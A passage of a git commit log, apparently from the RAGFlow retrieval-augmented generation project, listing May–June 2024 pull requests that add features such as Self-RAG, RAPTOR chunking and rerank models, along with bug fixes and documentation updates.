### What problem does this PR solve?

#1069 
### Type of change

- [x] Documentation Update
2024-06-06 16:04:37 +08:00
ad87825a1b The interface supported by Traditional Chinese is not complete #1074 (#1082)
…1074

### What problem does this PR solve?

The interface supported by Traditional Chinese is not complete #1074

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-06-06 16:03:52 +08:00
b04f0510f9 feat: modify the chinese translation of self-rag #1069 (#1081)
### What problem does this PR solve?

feat: modify the chinese translation of self-rag #1069

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-06-06 15:57:58 +08:00
1552dca28d feat: support Self-RAG #1069 (#1079)
### What problem does this PR solve?

feat: support Self-RAG #1069
### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-06-06 15:30:51 +08:00
db35e9df4f feat: run flow (#1076)
### What problem does this PR solve?

feat: run flow #918 

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-06-06 15:00:37 +08:00
d9dc183a0e rm wrongly uploaded py (#1073)
### What problem does this PR solve?


### Type of change


- [x] Refactoring
2024-06-06 13:49:48 +08:00
195498daaa feat: Support Password Access for ElasticSearch (#1072)
### What problem does this PR solve?

Using password authentication to access ElasticSearch is essential,
especially in a production environment.

This PR will enable password access support.

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-06-06 13:19:26 +08:00
4454ba7a1e add self-rag (#1070)
### What problem does this PR solve?

#1069 

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-06-06 11:13:39 +08:00
72c6784ff8 feat: fetch flow (#1068)
### What problem does this PR solve?
feat: fetch flow #918 
feat: save graph

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-06-06 11:01:14 +08:00
b6980d8a16 add version to package volcengine (#1062)
### What problem does this PR solve?

#992 

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-06-05 12:18:36 +08:00
39ac3b1e60 feat: add custom edge (#1061)
### What problem does this PR solve?
feat: add custom edge
feat: add flow card
feat: add store for canvas
#918 

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-06-05 10:46:06 +08:00
b8eedbdd86 refine rerank (#1056)
### What problem does this PR solve?


### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-06-04 17:27:00 +08:00
8295979bb2 delete SDK repo and edit readme (#1054)
### What problem does this PR solve?

delete SDK repo and edit readme

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-06-04 11:13:26 +08:00
037657c1ce fix: change the address of the ollama document (#1043)
### What problem does this PR solve?

fix: change the address of the ollama document #1042

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-06-04 10:42:55 +08:00
4fba0427eb added delete_dataset method (#1051)
### What problem does this PR solve?

Added delete_dataset method and test for it.

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-06-04 09:50:47 +08:00
c74d4d683e Update SDK->sdk, and add create_dataset (#1047)
### What problem does this PR solve?

Add create_dataset method, test for it, and update SDK->sdk.

### Type of change

- [x] New Feature (non-breaking change which adds functionality)

Signed-off-by: cecilia-uu <konghui1996@163.com>
2024-06-03 20:14:47 +08:00
0b15c47d70 [doc] Updated document on max map count (#1037)
### What problem does this PR solve?

_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._

### Type of change

- [x] Documentation Update
2024-06-03 17:01:02 +08:00
7d41de42a1 create the python sdk to return version (#1039)
### What problem does this PR solve?

Create python SDK to return the version of RAGFlow.

### Type of change

- [x] New Feature (non-breaking change which adds functionality)

---------

Co-authored-by: cecilia-uu <konghui1996@163.com>
2024-06-03 15:59:50 +08:00
9517a27844 fix: fixed the problem that the api will be called directly after selecting the chat assistant picture (#1034)
### What problem does this PR solve?

fix: fixed the problem that the api will be called directly after
selecting the chat assistant picture #1033

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-06-03 13:42:56 +08:00
cc064040a2 refine API request data processing (#1031)
### What problem does this PR solve?

#1024 

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-06-03 09:02:25 +08:00
cdea1d0a85 Update readme and add license (#1018)
### What problem does this PR solve?

- Update readme
- Add license

### Type of change

- [x] Documentation Update

---------

Signed-off-by: Jin Hai <haijin.chn@gmail.com>
2024-06-01 16:24:10 +08:00
1de31ca9f6 refine file select code (#1021)
### What problem does this PR solve?

#1015 

### Type of change

- [x] Refactoring
2024-05-31 19:44:33 +08:00
4ec845c0a6 Add API for moving files (#1016)
### What problem does this PR solve?

Add backend API support for moving files into other directory

### Type of change
- [x] New Feature (non-breaking change which adds functionality)
2024-05-31 18:11:25 +08:00
c58a1c48eb Fix: bug #991 (#1013)
### What problem does this PR solve?

issue #991

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)

---------

Co-authored-by: KevinHuSh <kevinhu.sh@gmail.com>
2024-05-31 18:03:47 +08:00
fefe7124a1 Update README (#1014)
### What problem does this PR solve?

_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._

### Type of change

- [x] Documentation Update

Signed-off-by: Jin Hai <haijin.chn@gmail.com>
2024-05-31 17:53:06 +08:00
ebdc283cd5 Update README_zh.md,typo (#997)
typo

### What problem does this PR solve?

_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._

### Type of change

- [x] Documentation Update
2024-05-31 16:44:59 +08:00
260c68f60c Adding the Minimax model (#1009)
### What problem does this PR solve?

Added support for MiniMax LLM

### Type of change

- [x] New Feature (non-breaking change which adds functionality)

---------

Co-authored-by: cecilia-uu <konghui1996@163.com>
2024-05-31 16:38:53 +08:00
5d2f7136dd fix chunk modification bug (#1011)
### What problem does this PR solve?

As title.

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-31 15:45:11 +08:00
GYH
b85c15cc96 Add file rag/svr/discord_svr.py (#1008)
### What problem does this PR solve?

File rag/svr/discord_svr.py is for discord bot.

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-05-31 13:47:15 +08:00
9ed0e50f6b Update info (#1005)
### What problem does this PR solve?

_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._

### Type of change

- [x] Refactoring

Signed-off-by: Jin Hai <haijin.chn@gmail.com>
2024-05-31 09:53:04 +08:00
b9bb11879f fix #994 (#1006)
### What problem does this PR solve?

#994 

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-31 09:46:22 +08:00
dc7afe46fb fix bug 994 ,991 (#1004)
### What problem does this PR solve?

#994 
#991 

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-31 09:24:24 +08:00
4f4d8baf49 Update README (#1001)
### What problem does this PR solve?

_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._

### Type of change

- [x] Documentation Update

Signed-off-by: Jin Hai <haijin.chn@gmail.com>
2024-05-30 19:17:58 +08:00
83803a72ee fix ollama bug (#999)
### What problem does this PR solve?


### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-30 18:03:36 +08:00
c3c2515691 Update README (#998)
### What problem does this PR solve?

_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._

### Type of change

- [x] Documentation Update

---------

Signed-off-by: Jin Hai <haijin.chn@gmail.com>
2024-05-30 18:00:02 +08:00
117a173fff fix tk_count undefine issue (#996)
### What problem does this PR solve?


### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-30 16:18:15 +08:00
77363a0875 fix bge rerank normalize issue (#988)
### What problem does this PR solve?


### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-30 12:55:17 +08:00
843720f958 fix bug in pdf parser (#986)
### What problem does this PR solve?

#963 

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-30 11:47:36 +08:00
f077b57f8b set ollama keep_alive (#985)
### What problem does this PR solve?

#980 

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-30 11:27:58 +08:00
c62834f870 fix: fixed the issue of error reporting when saving chat configuration #965 (#984)
### What problem does this PR solve?

fix: fixed the issue of error reporting when saving chat configuration
#965

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-30 11:10:54 +08:00
0171082cc5 fix create dialog bug (#982)
### What problem does this PR solve?


### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-30 09:25:05 +08:00
8dd45459be Add support for HTML file (#973)
### What problem does this PR solve?

Add support for HTML file

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-05-30 09:12:55 +08:00
dded365b8d Fix:After being idle for a while, new tasks need to be cancel and redo (#958)
### What problem does this PR solve?

After being idle for a while (When Redis Queue exceeds the
SVR_QUEUE_RETENTION(60*60) expiration time), new tasks need to be cancel
and redo.

When use xgroup_create to create a consumer group, set the ID to "$",
meaning that only messages added to the stream after the group is
created will be visible to new consumers. If the application scenario
requires processing messages that already exist in the queue, you might
need to change this ID to "0", so that the new consumer group can read
all messages from the beginning.


### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-30 09:03:11 +08:00
9fdd517af6 Update README.md (#978)
### What problem does this PR solve?

_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._

### Type of change

- [x] Documentation Update
2024-05-29 20:22:41 +08:00
2604ded2e4 Update README.md (#976)
### What problem does this PR solve?

_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._

### Type of change

- [x] Documentation Update
2024-05-29 20:02:16 +08:00
758eb03ccb fix jina adding issure and term weight refinement (#974)
### What problem does this PR solve?

#724 #162

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (non-breaking change which adds functionality)
2024-05-29 19:38:57 +08:00
e0d05a3895 fix: if the conversation name is too long, it will overflow the current item. #607 (#972)
### What problem does this PR solve?

fix: if the conversation name is too long, it will overflow the current
item. #607

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-29 18:32:03 +08:00
614defec21 add rerank model (#969)
### What problem does this PR solve?

feat: add rerank models to the project #724 #162

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-05-29 16:50:02 +08:00
e1f0644deb feat: add jina (#967)
### What problem does this PR solve?
feat: add jina #650 

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-05-29 16:48:52 +08:00
a135f9f5b6 feat: add rerank models to the project #724 #162 (#966)
### What problem does this PR solve?

Vector similarity weight is displayed incorrectly #965
feat: add rerank models to the project #724 #162
### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-29 16:19:08 +08:00
daa4799385 limit the system context length of conversation messages. (#962)
### What problem does this PR solve?

#951 

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-29 10:40:07 +08:00
495a6434ec feat: add FlowHeader and delete edge (#959)
### What problem does this PR solve?
feat: add FlowHeader and delete edge #918 

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-05-29 10:01:39 +08:00
21aac545d9 Expanded the supported LLM list (#960)
### What problem does this PR solve?

_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._

### Type of change

- [x] Documentation Update
2024-05-28 20:13:03 +08:00
0f317221b4 Update README (#956)
### What problem does this PR solve?

Update README due to support new LLMs.

### Type of change

- [x] Documentation Update

---------

Signed-off-by: Jin Hai <haijin.chn@gmail.com>
2024-05-28 20:05:02 +08:00
a427672229 Fixed a docusaurus display issue (#954)
### What problem does this PR solve?

_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._

### Type of change

- [x] Documentation Update

---------

Co-authored-by: KevinHuSh <kevinhu.sh@gmail.com>
2024-05-28 17:26:13 +08:00
196f2b445f fix: fixed the issue of 404 error in the user settings page of the demo site (#948)
### What problem does this PR solve?

fix: fixed the issue of 404 error in the user settings page of the demo
site #947

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-28 11:22:56 +08:00
5041677f11 Add umap-learn, fasttext and volcengine in requirements_arm.txt (#945)
### What problem does this PR solve?

Complete the requirements for ARM

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-05-28 11:13:48 +08:00
7eee193956 fix #917 #915 (#946)
### What problem does this PR solve?

#917 
#915

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-28 11:13:02 +08:00
9ffd7ae321 Added support for Baichuan LLM (#934)
### What problem does this PR solve?

- Added support for Baichuan LLM

### Type of change

- [x] New Feature (non-breaking change which adds functionality)

Co-authored-by: 海贼宅 <stu_xyx@163.com>
2024-05-28 09:09:37 +08:00
ec6ae744a1 minor editorial updates for clarity (#941)
### What problem does this PR solve?

_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._

### Type of change

- [x] Documentation Update
2024-05-27 20:35:08 +08:00
d9bc093df1 feat: test buildNodesAndEdgesFromDSLComponents (#940)
### What problem does this PR solve?
 feat: test buildNodesAndEdgesFromDSLComponents #918

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-05-27 19:35:14 +08:00
571aaaff22 Add Dockerfile and requirements.txt for arm (#936)
### What problem does this PR solve?

#253 

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-05-27 19:34:49 +08:00
GYH
7d8e03ec38 Update docnm_kwd to doc_name (#939)
### What problem does this PR solve?

Update docnm_kwd to doc_name 
#908 

### Type of change


- [x] Refactoring
2024-05-27 19:14:04 +08:00
65677f65c9 Updated RESTful API Reference (#908)
### What problem does this PR solve?

_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._

### Type of change

- [x] Documentation Update
2024-05-27 18:34:16 +08:00
89d296feab Remove duplicated FROM. (#935)
### What problem does this PR solve?
Remove duplicated FROM in Dockerfile.cuda.

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-27 17:16:47 +08:00
3ae8a87986 Expanded list of locally deployed embedding models (#930)
### What problem does this PR solve?

_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._

### Type of change

- [x] Documentation Update
2024-05-27 14:01:52 +08:00
46454362d7 fix raptor bugs (#928)
### What problem does this PR solve?

#922 
### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-27 11:01:20 +08:00
55fb96131e feat: build react flow nodes and edges from mock data #918 (#919)
### What problem does this PR solve?
feat: build react flow nodes and edges from mock data #918

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-05-27 08:21:30 +08:00
20b57144b0 syntax error (#924)
### What problem does this PR solve?

_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-27 08:20:32 +08:00
9e3a0e4d03 The fasttext library is missing, and it is used in the operators.py file. (#925)
### What problem does this PR solve?

_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-27 08:18:47 +08:00
c0d71adaa2 Bug fix for volcengine (#909)
### What problem does this PR solve?
Bug fixes for the VolcEngine

- Bug fix for front-end configuration code of VolcEngine

- Bug fix for tokens counting logic of VolcEngine


### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)

---------

Co-authored-by: 海贼宅 <stu_xyx@163.com>
2024-05-24 11:34:39 +08:00
735bdf06a4 Update README (#901)
### What problem does this PR solve?

Update README due to implement RAPTOR.

### Type of change

- [x] Documentation Update

---------

Signed-off-by: Jin Hai <haijin.chn@gmail.com>
2024-05-24 08:30:08 +08:00
fe18627ebc Fix some syntax errors, re not import (#904)
re not import

### What problem does this PR solve?

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-23 19:38:13 +08:00
4cda40c3ef feat: fixed issue with threshold translation #882 and add NodeContextMenu (#906)
### What problem does this PR solve?

feat: fixed issue with threshold translation #882
feat: add NodeContextMenu

### Type of change


- [ ] New Feature (non-breaking change which adds functionality)
2024-05-23 18:53:04 +08:00
GYH
1e5c5abe58 Update api_md document/rm (#894)
### What problem does this PR solve?

Update api_md document/rm
#717 

### Type of change

- [x] Documentation Update
2024-05-23 15:19:58 +08:00
6f99bbbb08 add raptor (#899)
### What problem does this PR solve?

#882 

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-05-23 14:31:16 +08:00
3bbdf3b770 fixbug for computing 'not concating feature' (#896)
### What problem does this PR solve?

When pdfparser call `_naive_vertical_merge` method,there is a "not
concating feature " value by computing difference between `b` and `b_`'s
layoutno ,but actually is `b` and `b`. I think it's a bug, so fix it.
Please check again.

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-23 14:29:42 +08:00
070b53f3bf feat: RAPTOR is not displayed when the parsing method is picture. (#897)
### What problem does this PR solve?

Implements RAPTOR for better chunking #882

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-05-23 14:13:09 +08:00
eb51ad73d6 Add support for VolcEngine - the current version supports SDK2 (#885)
- The main idea is to assemble **ak**, **sk**, and **ep_id** into a
dictionary and store it in the database **api_key** field
- I don’t know much about the front-end, so I learned from Ollama, which
may be redundant.

### Configuration method

- model name

- Format requirements: {"VolcEngine model name":"endpoint_id"}
    - For example: {"Skylark-pro-32K":"ep-xxxxxxxxx"}
    
- Volcano ACCESS_KEY
- Format requirements: VOLC_ACCESSKEY of the volcano engine
corresponding to the model

- Volcano SECRET_KEY
- Format requirements: VOLC_SECRETKEY of the volcano engine
corresponding to the model
    
### What problem does this PR solve?

_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-05-23 11:15:29 +08:00
GYH
fbd0d74053 Add /api/document/rm function (#887)
### What problem does this PR solve?

Delete files from a knowledge base.

#717 

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-05-23 10:32:56 +08:00
170186ee4d feat: remove the space before promptText (#886)
### What problem does this PR solve?

feat: remove the space before promptText #882 


### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-05-22 18:36:55 +08:00
ed184ed87e Implements RAPTOR for better chunking #882 (#883)
### What problem does this PR solve?

Implements RAPTOR for better chunking #882

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-05-22 18:04:18 +08:00
GYH
43412571f7 Add api.md:/api/list_kb_docs/ description (#881)
### What problem does this PR solve?

Add api.md:/api/list_kb_docs/ description
#717 

### Type of change

- [x] Documentation Update
2024-05-22 17:37:11 +08:00
17489e6c6c fix import error (#877)
Fix import error for user_app.py

---------

Co-authored-by: yonghui li <yonghui.li@bondex.com.cn>
2024-05-22 16:14:53 +08:00
21453ffff0 fixed: The choices may be empty. (#876)
### What problem does this PR solve?


### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-22 15:29:07 +08:00
GYH
be13429d05 Add api/list_kb_docs function and modify api/list_chunks (#874)
### What problem does this PR solve?
#717 

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-05-22 14:58:56 +08:00
5178daeeaf Fixed a format issue (#872)
### What problem does this PR solve?

_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._

### Type of change

- [x] Documentation Update
2024-05-22 13:39:38 +08:00
d5b8d8e647 fixed a format issue for docusaurus publication (#871)
### What problem does this PR solve?

_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._

### Type of change

- [x] Documentation Update
2024-05-22 12:45:34 +08:00
b62a20816e fix: display specific error message when previewing file error #868 (#869)
### What problem does this PR solve?

fix: display specific error message when previewing file error  #868


### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-22 11:54:32 +08:00
3cae87a902 Reorganized docs for docusaurus publish (#860)
### What problem does this PR solve?

_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._

### Type of change

- [x] Documentation Update
2024-05-21 20:53:55 +08:00
1797f5ce31 fix: the site domain name in the Chat Bot API is hardcoded. #776 (#859)
### What problem does this PR solve?

fix: the site domain name in the Chat Bot API is hardcoded. #776

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-21 17:37:19 +08:00
fe4b2e4670 Updated Launch service from source (#856)
### What problem does this PR solve?

Some nitpicking editorial updates.

### Type of change

- [x] Documentation Update
2024-05-21 16:43:58 +08:00
250119e03a Fix missing docker image version prefix v. (#855)
The variable RAGFLOW_VERSION in docker/.env should start with prefix v
to match docker image tag.

### What problem does this PR solve?

_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-21 14:26:43 +08:00
bae376a479 Update db_models.py 2024-05-21 12:02:22 +08:00
6c32f80bc9 Update before release (#854)
### What problem does this PR solve?

Update version information before release 0.6.0.

### Type of change

- [x] Documentation Update

Signed-off-by: Jin Hai <haijin.chn@gmail.com>
2024-05-21 11:14:02 +08:00
7e74546b73 Set the language default value of the language based on the LANG envi… (#853)
…ronment variable at the initial creation.

1. Set the User's default language based on LANG;
2. Set the Knowledgebase's default language based on LANG; 
3. Set the default language of the Dialog based on LANG;

### What problem does this PR solve?

_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._

### Type of change

- [ ] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
2024-05-21 11:05:41 +08:00
25781113f9 Updated how to handle stalled file parsing (#851)
### What problem does this PR solve?

Refresh file parsing if it is stalled.

### Type of change

- [x] Documentation Update
2024-05-21 09:03:30 +08:00
16fa7db737 Create start_chat.md (#836)
### What problem does this PR solve?

Added instructions on how to set up an AI chat in RAGFlow.

### Type of change

- [x] Documentation Update
2024-05-20 20:06:17 +08:00
a12fcf9156 fix minio helth bug (#850)
### What problem does this PR solve?

#643 

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-20 19:35:30 +08:00
GYH
c27c02ea67 Split Excel file into different chunks (#847)
### What problem does this PR solve?


Split Excel into different chunk
### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-05-20 18:35:15 +08:00
71068895ae Set the number of task_executor processes through the environment variable WS. (#846)
### What problem does this PR solve?


### Type of change

- [x] Other (please describe): Use environment variable to control the
task executor processor number.
2024-05-20 18:32:24 +08:00
93b35f4e58 feat: display the version and backend service status on the page (#848)
### What problem does this PR solve?

#643 feat: display the version and backend service status on the page

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-05-20 18:28:36 +08:00
9a01d1b876 The default max tokens of 215 is too small, answers are often cut off.I will modify it to 512 to address this issue. (#845)
### What problem does this PR solve?

### Type of change

- [x] Refactoring
2024-05-20 17:25:19 +08:00
a7bd427116 add locally deployed llm (#841)
### What problem does this PR solve?


### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-05-20 12:40:59 +08:00
2b36283712 fix english query bug (#840)
### What problem does this PR solve?

#834 

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-20 12:23:51 +08:00
6683179d6a fix bug about removing KB. (#839)
### What problem does this PR solve?

#838 

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-20 09:23:57 +08:00
673a28e492 fix bug of chat without stream (#830)
### What problem does this PR solve?

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-17 20:03:00 +08:00
2bfacd0469 refine doc about API: completion (#829)
### What problem does this PR solve?
#808 

### Type of change

- [x] Documentation Update
2024-05-17 18:06:20 +08:00
b3c923da6b add doc ids in API: completion (#827)
### What problem does this PR solve?
#808 

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-05-17 17:51:54 +08:00
a1586e0af9 correct mismatched kb doc number (#826)
### What problem does this PR solve?

#620

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-17 17:27:39 +08:00
f6a599461f fix zhipuAI stream issue (#825)
### What problem does this PR solve?


### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-17 17:07:33 +08:00
GYH
081f922ee6 0517 list chunks (#821)
### What problem does this PR solve?

#717 

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-05-17 15:58:05 +08:00
9f0f5b45cc Default language will be given according to the browse setting and also can be configured #801 (#823)
### What problem does this PR solve?

Default language will be given according to the browse setting and also
can be configured #801
### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-05-17 15:38:28 +08:00
a2a6a35e94 fix doc number miss-match issue (#822)
### What problem does this PR solve?

#620 

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-17 15:35:09 +08:00
9e5d501e83 fix data init error (#820)
### What problem does this PR solve?

#810 

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-17 14:33:19 +08:00
4ca176bd41 fix: thumbnails are too large in the chat box #818 (#819)
### What problem does this PR solve?

fix: thumbnails are too large in the chat box #818

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-17 14:16:55 +08:00
c3bc72dfd9 fix too large thumbnail issue (#817)
### What problem does this PR solve?

#709

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-17 14:04:21 +08:00
2dd705fe68 feat: add feishu oauth (#815)
### What problem does this PR solve?

The back-end code adds Feishu oauth

### Type of change

- [x] New Feature (non-breaking change which adds functionality)

Co-authored-by: yonghui li <yonghui.li@bondex.com.cn>
2024-05-17 13:47:05 +08:00
d1614107e2 fix stream chat for ollama (#816)
### What problem does this PR solve?

#709

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-17 12:07:00 +08:00
05fa3aeb08 use smaller docker images (#813)
### What problem does this PR solve?

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-05-17 09:00:24 +08:00
e73ce39b66 Add 2 embeding models from OpenAI (#812)
### What problem does this PR solve?

#810 

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-05-17 08:51:29 +08:00
d54d1375a5 Initial draft of configure knowledge base (#794)
### What problem does this PR solve?

_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._

### Type of change

- [x] Documentation Update
2024-05-16 21:27:09 +08:00
c6c9dbde64 feat: Support for conversational streaming (#809)
### What problem does this PR solve?

feat: Support for conversational streaming
#709

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-05-16 20:15:02 +08:00
95f809187e add stream chat (#811)
### What problem does this PR solve?

#709 
### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-05-16 20:14:53 +08:00
d6772f5dd7 add version (#807)
### What problem does this PR solve?
#709 
### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-05-16 16:17:48 +08:00
63ca15c595 Fix a bug in 'assistant-setting.tsx' that causes the upload button to… (#796)
… incorrectly appear on the model settings page.

### What problem does this PR solve?

This is an issue with the Upload component on the assistant-setting
page. I use the show variable to explicitly control the button component
within it.

see:

![20240516000417](https://github.com/infiniflow/ragflow/assets/37476944/de88f911-6dbd-412d-a981-86cf60aa2257)


### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] Other (please describe): Add the local models that DeepDoc depends
on to the gitignore file in dev mode.

Signed-off-by: liuchao <lcjia_you@126.com>
2024-05-16 10:49:41 +08:00
7b144cc086 fix: can't capitalize file or folder name (#798)
### What problem does this PR solve?


#792 

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-16 09:10:29 +08:00
1c4e92ed35 Knowledge base search is case sensitive (#797)
### What problem does this PR solve?
#793 
### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-16 09:00:12 +08:00
10e83f26dc Added file management guide (#788)
### What problem does this PR solve?

Added guide with instructions on managing files in RAGFlow. 

### Type of change

- [x] Documentation Update
2024-05-15 20:02:41 +08:00
6ff63ee2ba Support for code files parse (#789)
### What problem does this PR solve?

_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-05-15 16:34:28 +08:00
GYH
12b4c5668c Updated conversation_api.md document/upload (#787)
### What problem does this PR solve?

Updated conversation_api.md document/upload parameter description

### Type of change

- [x] Documentation Update
2024-05-15 16:33:28 +08:00
baad35df30 fix: .knowledgebase folder can be deleted bug and change "Add file to knowledge base" to "Link file to knowledge base" bug (#786)
### What problem does this PR solve?
fix: .knowledgebase folder can be deleted bug 
fix: change "Add file to knowledge base" to "Link file to knowledge
base" bug
#783 #784

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-15 14:53:36 +08:00
5effbfac80 fix: remove Top K in retrieval testing #770 and if the document parsing fails, the error message returned by the backend is displayed (#782)
### What problem does this PR solve?

fix: remove Top K in retrieval testing  #770
fix: if the document parsing fails, the error message returned by the
backend is displayed.

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-15 13:58:30 +08:00
4d47b2b459 fix a string format error (#781)
### What problem does this PR solve?


### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-15 13:02:31 +08:00
d8c080ee52 fix bugs in searching file using keywords (#780)
### What problem does this PR solve?


### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-15 12:51:57 +08:00
GYH
626ace8639 Updated document upload method (#777)
### What problem does this PR solve?

api_app.py
/document/upload 
add two non mandatory parameters
parser_id:
[naive,qaresume,manual,table,paper,book,laws,presentation,picture,one]
run: 1

### Type of change
- [x] New Feature (non-breaking change which adds functionality)
2024-05-15 12:22:11 +08:00
1e923f1c90 Update README (#779)
### What problem does this PR solve?

#771 

### Type of change

